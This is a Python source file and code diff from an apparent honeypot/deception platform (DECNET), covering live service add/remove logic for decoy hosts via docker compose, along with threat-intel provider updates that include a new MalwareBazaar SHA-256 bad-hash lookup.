"""Re-push the host's full shard to its worker agent.
Uses the same code path as POST /swarm/deploy: load master state, filter
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
The agent regenerates compose and recreates only the changed containers.
Idempotent for unchanged deckies.
"""
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
state = _load_state()
if state is None:
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
return
config, _compose_path = state
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
if not host_deckies:
log.warning(
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
host_uuid,
)
return
filtered = config.model_copy(update={"deckies": host_deckies})
await dispatch_decnet_config(filtered, repo)
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
from decnet.engine.deployer import resync_agent_topology
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
if not hydrated.get("topology", {}).get("target_host_uuid"):
return # unihost topology — local compose is authoritative
await resync_agent_topology(repo, topology_id)
log = get_logger("engine.services_live")
DeckyKind = Literal["fleet", "topology"]
class ServiceMutationError(ValueError):
"""Raised for caller-correctable failures. The API layer dispatches on
subclass to produce 4xx codes; base class maps to 422.
"""
class ServiceNotFoundError(ServiceMutationError):
"""Decky or topology does not exist → 404."""
class ServiceConflictError(ServiceMutationError):
"""Idempotency violation (already on / not on) → 409."""
def _validate_service_for_per_decky(name: str) -> BaseService:
"""Return the registered service or raise ``ServiceMutationError``.
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
responder), not per-decky — we reject the per-decky add/remove
request rather than silently producing a no-op compose entry.
"""
try:
svc = get_service(name)
except KeyError as exc:
raise ServiceMutationError(f"unknown service {name!r}") from exc
if svc.fleet_singleton:
raise ServiceMutationError(
f"service {name!r} is fleet_singleton; not addable per-decky"
)
return svc
async def _publish(topic: str, payload: dict[str, Any]) -> None:
"""Best-effort bus publish — same shape as the canary planter's helper."""
try:
bus = _get_bus()
await bus.connect()
await bus.publish(topic, payload)
await bus.close()
except Exception as e: # noqa: BLE001
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path
async def _topology_decky(
repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
for d in hydrated["deckies"]:
cfg = d.get("decky_config") or {}
name = cfg.get("name") or d.get("name")
if name == decky_name:
return d
raise ServiceNotFoundError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)
async def _rerender_topology_compose(
repo: BaseRepository, topology_id: str,
) -> Path:
"""Re-hydrate + re-render the per-topology compose file.
Called after a successful DB update so future deploys reflect the
change; without this the file would still describe the old service
set and a subsequent ``up -d`` would resurrect the removed service.
"""
hydrated = await hydrate(repo, topology_id)
if hydrated is None: # pragma: no cover — narrow race
raise ServiceNotFoundError(
f"topology {topology_id!r} disappeared mid-mutation"
)
path = _topology_compose_path(topology_id)
_write_topology_compose(hydrated, path)
return path
async def _add_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
update: dict[str, Any] = {"services": services}
# If the caller supplied initial config, fold it into decky_config
# BEFORE compose regen so the first ``up`` materialises the env on
# the new container — no follow-up apply needed.
if initial_config:
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = initial_config
cfg_blob["service_config"] = sc
update["decky_config"] = cfg_blob
await repo.update_topology_decky(decky["uuid"], update)
compose_path = await _rerender_topology_compose(repo, topology_id)
if await _topology_is_agent_pinned(repo, topology_id):
# Agent-pinned: the master's local compose has nothing to up.
# Push the new hydrated blob to the worker.
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
# Run compose in a worker thread so the API event loop stays
# responsive — same pattern as engine/deployer.deploy_topology.
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return False
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
async def _remove_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
compose_path = _topology_compose_path(topology_id)
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
if not agent_pinned:
# Stop + rm before persisting + re-rendering so a half-completed
# mutation leaves the operator a clear state to retry from
# (container still running; DB still says service is on).
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await repo.update_topology_decky(decky["uuid"], {"services": services})
await _rerender_topology_compose(repo, topology_id)
if agent_pinned:
# Worker tears down the removed service when it diffs the
# incoming hydrated blob against its current state.
await _resync_agent_topology(repo, topology_id)
return services
# ---------------------------------------------------------- fleet path
def _fleet_state_or_raise() -> tuple[Any, Path]:
state = _load_state()
if state is None:
raise ServiceMutationError(
"no fleet state on disk — run `decnet up` first"
)
return state
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
for d in config.deckies:
if d.name == decky_name:
return d
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
async def _persist_fleet_change(
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
"""Persist the mutation to JSON state, compose file, and the DB row."""
config, _ = _load_state()
target = _fleet_find_decky(config, decky.name)
target.services = services
_save_state(config, compose_path)
_write_compose(config, compose_path)
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
# change without waiting for the reconciler.
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": services,
"decky_config": target.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
async def _add_fleet_service(
repo: BaseRepository,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
if initial_config:
# Same path as _update_fleet_service_config: stash the validated
# cfg on the decky model so the compose write picks it up.
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = initial_config
decky.service_config = sc
await _persist_fleet_change(repo, decky, services, compose_path)
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
# Master has no container for this decky — re-push the host's
# shard so the worker materialises the new service.
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _remove_fleet_service(
repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
services: list[str] = list(decky.services or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if not swarm_host_uuid:
# Local: stop+rm before persist so the operator has a clear retry
# state if compose fails halfway. Swarm: skip — the worker's compose
# will handle the removal when the redispatched config drops the
# service from the decky.
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await _persist_fleet_change(repo, decky, services, compose_path)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
return services
# ---------------------------------------------------------- public api
async def add_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
config: dict | None = None,
) -> list[str]:
"""Add *service_name* to a deployed decky.
Validates the service registry (rejects unknown / fleet_singleton
names) and the optional ``config`` against the service's schema,
persists the change, regenerates the compose file, runs
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
and publishes ``decky.<name>.service.added`` on the bus.
``config`` is the same dict shape PUT/POST .../config accepts; it's
coerced via ``BaseService.validate_cfg`` before any state write so
a 400-class failure leaves zero side-effects.
Returns the post-mutation services list.
"""
svc = _validate_service_for_per_decky(service_name)
initial_config = svc.validate_cfg(config) if config else {}
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _add_topology_service(
repo, topology_id, decky_name, service_name,
initial_config=initial_config,
)
elif decky_kind == "fleet":
services = await _add_fleet_service(
repo, decky_name, service_name,
initial_config=initial_config,
)
else: # pragma: no cover — Literal narrows
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.add decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services
async def update_service_config(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
cfg: dict,
apply: bool = False,
topology_id: Optional[str] = None,
) -> dict:
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
The submitted dict is validated against the service's
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
DB write, so a 400-class failure leaves zero side-effects.
``apply=False`` (Save): only the DB row + compose file are updated.
The running container keeps its old env.
``apply=True`` (Apply): same persistence, then a force-recreate of
``<decky>-<service>`` so the container picks
up the new env. Destructive: drops any
in-container session state on that service.
Returns the post-mutation validated cfg.
"""
svc = _validate_service_for_per_decky(service_name)
validated = svc.validate_cfg(cfg)
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
await _update_topology_service_config(
repo, topology_id, decky_name, service_name, validated, apply=apply,
)
elif decky_kind == "fleet":
await _update_fleet_service_config(
repo, decky_name, service_name, validated, apply=apply,
)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"service_config": validated,
"recreated": bool(apply),
},
)
log.info(
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
decky_name, topology_id, service_name, apply,
)
return validated
async def _update_topology_service_config(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
decky = await _topology_decky(repo, topology_id, decky_name)
if service_name not in (decky.get("services") or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = validated
cfg_blob["service_config"] = sc
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
compose_path = await _rerender_topology_compose(repo, topology_id)
if apply:
if await _topology_is_agent_pinned(repo, topology_id):
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def _update_fleet_service_config(
repo: BaseRepository,
decky_name: str,
service_name: str,
validated: dict,
*,
apply: bool,
) -> None:
config, compose_path = _fleet_state_or_raise()
decky = _fleet_find_decky(config, decky_name)
if service_name not in (decky.services or []):
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
sc = dict(getattr(decky, "service_config", None) or {})
sc[service_name] = validated
decky.service_config = sc
_save_state(config, compose_path)
_write_compose(config, compose_path)
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
"name": decky.name,
"services": list(decky.services or []),
"decky_config": decky.model_dump(mode="json"),
"decky_ip": decky.ip,
"state": "running",
})
if apply:
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
if swarm_host_uuid:
await _redispatch_fleet_shard(repo, swarm_host_uuid)
else:
target = f"{decky_name}-{service_name}"
# Docker Compose tracks the previous container by ID. If that
# container was already removed (or renamed during a prior failed
# deploy), --force-recreate fails with "No such container". Pre-
# remove by name so Compose starts from a clean slate.
await anyio.to_thread.run_sync(
lambda: subprocess.run( # nosec B603 B607
["docker", "rm", "-f", target],
capture_output=True,
),
)
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
compose_file=compose_path,
),
)
async def remove_service(
repo: BaseRepository,
*,
decky_kind: DeckyKind,
decky_name: str,
service_name: str,
topology_id: Optional[str] = None,
) -> list[str]:
"""Remove *service_name* from a deployed decky.
Stops + removes the service container, persists the new services
list, re-renders the compose file (so the next ``up -d`` doesn't
bring it back), and publishes ``decky.<name>.service.removed``.
Returns the post-mutation services list.
"""
if decky_kind == "topology":
if not topology_id:
raise ServiceMutationError(
"decky_kind=topology requires topology_id",
)
services = await _remove_topology_service(
repo, topology_id, decky_name, service_name,
)
elif decky_kind == "fleet":
services = await _remove_fleet_service(repo, decky_name, service_name)
else: # pragma: no cover
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
await _publish(
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
{
"decky_name": decky_name,
"service_name": service_name,
"topology_id": topology_id,
"services": services,
},
)
log.info(
"services_live.remove decky=%s topology=%s service=%s",
decky_name, topology_id, service_name,
)
return services

View File

@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent / # DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
# updater / swarmctl subcommands (which never touch auth) can start without # updater / swarmctl subcommands (which never touch auth) can start without
# the master's JWT secret being present in the environment. # the master's JWT secret being present in the environment.
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log") DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on # Agent-side RFC 5424 sink written by decnet.collector.worker when run on
# a SWARM worker. The forwarder tails this file and ships lines over # a SWARM worker. The forwarder tails this file and ships lines over
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID") DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST") DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770) DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
# Bind address for the master-side swarm controller. Loopback by default —
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
# swarmctl-host in /etc/decnet/decnet.ini.
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
# Ingester batching: how many log rows to accumulate per commit, and the # Ingester batching: how many log rows to accumulate per commit, and the
# max wait (ms) before flushing a partial batch. Larger batches reduce # max wait (ms) before flushing a partial batch. Larger batches reduce

View File

@@ -128,8 +128,6 @@ async def reconcile_once(
container_states = await asyncio.to_thread( container_states = await asyncio.to_thread(
_collect_container_states, docker_client_factory, _collect_container_states, docker_client_factory,
) )
docker_known = container_states is not None
json_names = {d.name for d in json_deckies} json_names = {d.name for d in json_deckies}
# 1. INSERT: present in JSON, absent from DB. # 1. INSERT: present in JSON, absent from DB.
@@ -138,7 +136,7 @@ async def reconcile_once(
continue continue
new_state = ( new_state = (
_aggregate_decky_state(d.name, list(d.services), container_states) _aggregate_decky_state(d.name, list(d.services), container_states)
if docker_known else "running" if container_states is not None else "running"
) )
row_host = d.host_uuid or host_uuid row_host = d.host_uuid or host_uuid
await repo.upsert_fleet_decky({ await repo.upsert_fleet_decky({
@@ -168,7 +166,7 @@ async def reconcile_once(
) )
# 3. STATE: present in both, docker says something fresh. # 3. STATE: present in both, docker says something fresh.
if docker_known: if container_states is not None:
for d in json_deckies: for d in json_deckies:
existing = db_by_name.get(d.name) existing = db_by_name.get(d.name)
if existing is None: if existing is None:

View File

@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
from decnet.geoip.lookup import Lookup from decnet.geoip.lookup import Lookup
from decnet.geoip.paths import ensure_root from decnet.geoip.paths import ensure_root
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
from decnet.geoip.rir.parse import parse_file from decnet.geoip.rir.parse import Range, parse_file
logger = logging.getLogger("decnet.geoip.rir.provider") logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
except Exception as exc: except Exception as exc:
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc) logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
ranges = [] ranges: list[Range] = []
for path in self.data_paths(): for path in self.data_paths():
if not path.exists(): if not path.exists():
continue continue

View File

@@ -17,7 +17,6 @@ later if operators report drift.
""" """
from __future__ import annotations from __future__ import annotations
import json
import os import os
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Optional from typing import Optional
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
data = payload.get("data") or {} data = payload.get("data") or {}
score = int(data.get("abuseConfidenceScore") or 0) score = int(data.get("abuseConfidenceScore") or 0)
verdict = _score_to_verdict(score) verdict = _score_to_verdict(score)
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
# int codes per report. Flatten the union across all recent
# reports so the IntelLifter sees the full activity profile,
# not just the most-recent report's categories. Sorted for
# determinism (matters for tests + for the bus payload diff).
categories: set[int] = set()
for report in data.get("reports") or []:
if not isinstance(report, dict):
continue
for cat in report.get("categories") or []:
if isinstance(cat, int):
categories.add(cat)
return IntelResult( return IntelResult(
provider=self.name, provider=self.name,
verdict=verdict, verdict=verdict,
column_updates={ column_updates={
"abuseipdb_score": score, "abuseipdb_score": score,
"abuseipdb_raw": json.dumps(data), "abuseipdb_categories": sorted(categories),
"abuseipdb_raw": data,
"abuseipdb_queried_at": datetime.now(timezone.utc), "abuseipdb_queried_at": datetime.now(timezone.utc),
}, },
) )

View File

@@ -78,3 +78,33 @@ class IntelProvider(ABC):
entire IP. Implementations should also respect entire IP. Implementations should also respect
``self._semaphore`` to bound in-flight calls. ``self._semaphore`` to bound in-flight calls.
""" """
class MalHashProvider(ABC):
"""Abstract bad-hash lookup provider.
Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
vs IP), different consumer (the email ingester at observation time,
not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
Concrete impls today:
* :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
Future impls (paid VirusTotal subscription, in-house allowlist) plug
in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
"""
name: str
@abstractmethod
async def is_known_bad(self, sha256: str) -> bool:
"""Return whether *sha256* is on this provider's bad-hash list.
MUST NOT raise — return ``False`` on any error (the caller is the
ingester, not a worker; an exception here would taint a totally
unrelated bus payload). The provider is responsible for logging
its own errors.
"""

View File

@@ -21,7 +21,7 @@ from __future__ import annotations
import os import os
from typing import List from typing import List
from decnet.intel.base import IntelProvider from decnet.intel.base import IntelProvider, MalHashProvider
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox") _KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
return [p.strip().lower() for p in raw.split(",") if p.strip()] return [p.strip().lower() for p in raw.split(",") if p.strip()]
_mal_hash_singleton: MalHashProvider | None = None
_mal_hash_initialized: bool = False
def get_mal_hash_provider() -> MalHashProvider | None:
"""Return the configured malware-hash lookup provider singleton.
Sibling factory to :func:`get_intel_providers` — different keyspace
(file SHA-256 vs IP), different consumer (the email ingester at
observation time, not the IP-keyed intel-worker fan-out). Returns
``None`` only if intel is disabled wholesale; otherwise returns a
provider whose :meth:`is_known_bad` self-disables to a no-op when
``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
has to special-case "no provider configured."
"""
global _mal_hash_singleton, _mal_hash_initialized
if _mal_hash_initialized:
return _mal_hash_singleton
_mal_hash_initialized = True
if not _enabled():
_mal_hash_singleton = None
return None
from decnet.intel.mal_hash import MalwareBazaarProvider
_mal_hash_singleton = MalwareBazaarProvider()
return _mal_hash_singleton
def _reset_mal_hash_provider_for_testing() -> None:
"""Test hook — drop the singleton so the next call re-reads env."""
global _mal_hash_singleton, _mal_hash_initialized
_mal_hash_singleton = None
_mal_hash_initialized = False
def get_intel_providers() -> List[IntelProvider]: def get_intel_providers() -> List[IntelProvider]:
"""Return the configured threat-intel providers. """Return the configured threat-intel providers.

View File

@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
""" """
from __future__ import annotations from __future__ import annotations
import json
import time import time
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Any, Optional from typing import Any, Optional
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
verdict=None, # absence ≠ "benign", let other providers speak verdict=None, # absence ≠ "benign", let other providers speak
column_updates={ column_updates={
"feodo_listed": False, "feodo_listed": False,
"feodo_raw": "{}", "feodo_malware_family": None,
"feodo_raw": {},
"feodo_queried_at": datetime.now(timezone.utc), "feodo_queried_at": datetime.now(timezone.utc),
}, },
) )
family_obj = entry.get("malware")
family = (
family_obj if isinstance(family_obj, str) and family_obj else None
)
return IntelResult( return IntelResult(
provider=self.name, provider=self.name,
verdict="malicious", verdict="malicious",
column_updates={ column_updates={
"feodo_listed": True, "feodo_listed": True,
"feodo_raw": json.dumps(entry), "feodo_malware_family": family,
"feodo_raw": entry,
"feodo_queried_at": datetime.now(timezone.utc), "feodo_queried_at": datetime.now(timezone.utc),
}, },
) )

View File

@@ -25,7 +25,6 @@ Status code semantics:
""" """
from __future__ import annotations from __future__ import annotations
import json
import os import os
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Optional from typing import Optional
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
verdict="unknown", verdict="unknown",
column_updates={ column_updates={
"greynoise_classification": "unknown", "greynoise_classification": "unknown",
"greynoise_raw": json.dumps({"message": "not seen"}), "greynoise_name": None,
"greynoise_tags": [],
"greynoise_raw": {"message": "not seen"},
"greynoise_queried_at": datetime.now(timezone.utc), "greynoise_queried_at": datetime.now(timezone.utc),
}, },
) )
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):
classification = (data.get("classification") or "unknown").lower() classification = (data.get("classification") or "unknown").lower()
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown") verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
# "Censys") but no behavioral tag list — the tag taxonomy is
# paid-tier only. Persist whatever we got; a future non-Community
# provider may populate ``greynoise_tags``.
name_obj = data.get("name")
name = name_obj if isinstance(name_obj, str) and name_obj else None
tags_obj = data.get("tags")
tags: list[str] = (
[t for t in tags_obj if isinstance(t, str)]
if isinstance(tags_obj, list) else []
)
return IntelResult( return IntelResult(
provider=self.name, provider=self.name,
verdict=verdict, verdict=verdict,
column_updates={ column_updates={
"greynoise_classification": classification, "greynoise_classification": classification,
"greynoise_raw": json.dumps(data), "greynoise_name": name,
"greynoise_tags": tags,
"greynoise_raw": data,
"greynoise_queried_at": datetime.now(timezone.utc), "greynoise_queried_at": datetime.now(timezone.utc),
}, },
) )

195
decnet/intel/mal_hash.py Normal file
View File

@@ -0,0 +1,195 @@
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
shape, but operates on the SHA-256 keyspace instead of IPs and so
implements :class:`decnet.intel.base.MalHashProvider` rather than
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
the provider logs one warning at first refresh attempt and disables
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
without ever making a network call. The ingester treats that the same
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
bus payload (which is exactly what the predicate's ``is True`` check
does today, so the silent-no-op is behaviorally identical to "lane not
shipped yet").
"""
from __future__ import annotations
import csv
import io
import os
import time
import zipfile
from typing import Optional
from decnet.intel.base import MalHashProvider
from decnet.logging import get_logger
from decnet.net.http import stealth_client
log = get_logger("intel.mal_hash")
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
def _read_refresh_interval() -> float:
raw = os.environ.get(_REFRESH_INTERVAL_ENV)
if raw is None:
return _DEFAULT_REFRESH_S
try:
return float(raw)
except ValueError:
log.warning(
"%s=%r not a float; falling back to default %.0f",
_REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
)
return _DEFAULT_REFRESH_S
class MalwareBazaarProvider(MalHashProvider):
"""Bulk SHA-256 lookup against MalwareBazaar's full export."""
name = "malwarebazaar"
def __init__(
self,
*,
auth_key: Optional[str] = None,
refresh_interval_s: Optional[float] = None,
) -> None:
self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
self._refresh_interval_s = (
refresh_interval_s
if refresh_interval_s is not None
else _read_refresh_interval()
)
self._known: set[str] = set()
self._loaded_at: float = 0.0
self._last_error: Optional[str] = None
self._disabled_warned: bool = False
@property
def disabled(self) -> bool:
return self._auth_key is None
async def _refresh(self) -> Optional[str]:
"""Refetch the bulk feed. Returns an error string or ``None``."""
if self._auth_key is None:
return "no auth key"
try:
async with stealth_client(timeout=60.0) as client:
resp = await client.get(
_ENDPOINT, headers={"Auth-Key": self._auth_key},
)
except Exception as exc: # noqa: BLE001
return f"network: {exc}"
if resp.status_code != 200:
return f"HTTP {resp.status_code}"
body = resp.content
try:
new_known = _parse_dump(body)
except Exception as exc: # noqa: BLE001
return f"parse: {exc}"
if not new_known:
return "feed: empty"
self._known = new_known
self._loaded_at = time.monotonic()
self._last_error = None
log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
return None
async def _ensure_fresh(self) -> None:
if self.disabled:
if not self._disabled_warned:
log.warning(
"R0046 mal_hash_match disabled: %s unset",
_AUTH_KEY_ENV,
)
self._disabled_warned = True
return
if (
not self._known
or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
):
err = await self._refresh()
if err:
self._last_error = err
log.warning("malwarebazaar refresh failed: %s", err)
async def is_known_bad(self, sha256: str) -> bool:
if self.disabled:
return False
try:
await self._ensure_fresh()
except Exception as exc: # noqa: BLE001
# Belt and braces: _ensure_fresh swallows refresh failures
# but a bug in there shouldn't blow up the ingester payload.
log.exception("malwarebazaar refresh raised: %s", exc)
return False
return sha256.lower() in self._known
def _parse_dump(body: bytes) -> set[str]:
"""Extract SHA-256 hashes from MalwareBazaar's full dump.
The endpoint returns a ZIP archive containing a single CSV with a
``sha256_hash`` column. Some abuse.ch flavours of the same feed
family ship plain CSV instead — handle both by sniffing the magic
bytes. Hashes are lowercased; non-hex / wrong-length values are
dropped (defense in depth — we set-membership-test by exact match).
"""
if body[:2] == b"PK":
with zipfile.ZipFile(io.BytesIO(body)) as zf:
csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
if not csv_names:
raise ValueError("zip has no .csv member")
with zf.open(csv_names[0]) as fh:
csv_bytes = fh.read()
else:
csv_bytes = body
text = csv_bytes.decode("utf-8", errors="replace")
return _extract_hashes(text)
def _extract_hashes(text: str) -> set[str]:
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
The dump prefaces the table with ``#``-prefixed comment lines.
Skip those, find the header row, locate the column, then read the
rest. csv.reader handles the quoting (the ``signature`` column
contains commas and is properly quoted in the dump).
"""
body_lines = [
line for line in text.splitlines()
if line and not line.lstrip().startswith("#")
]
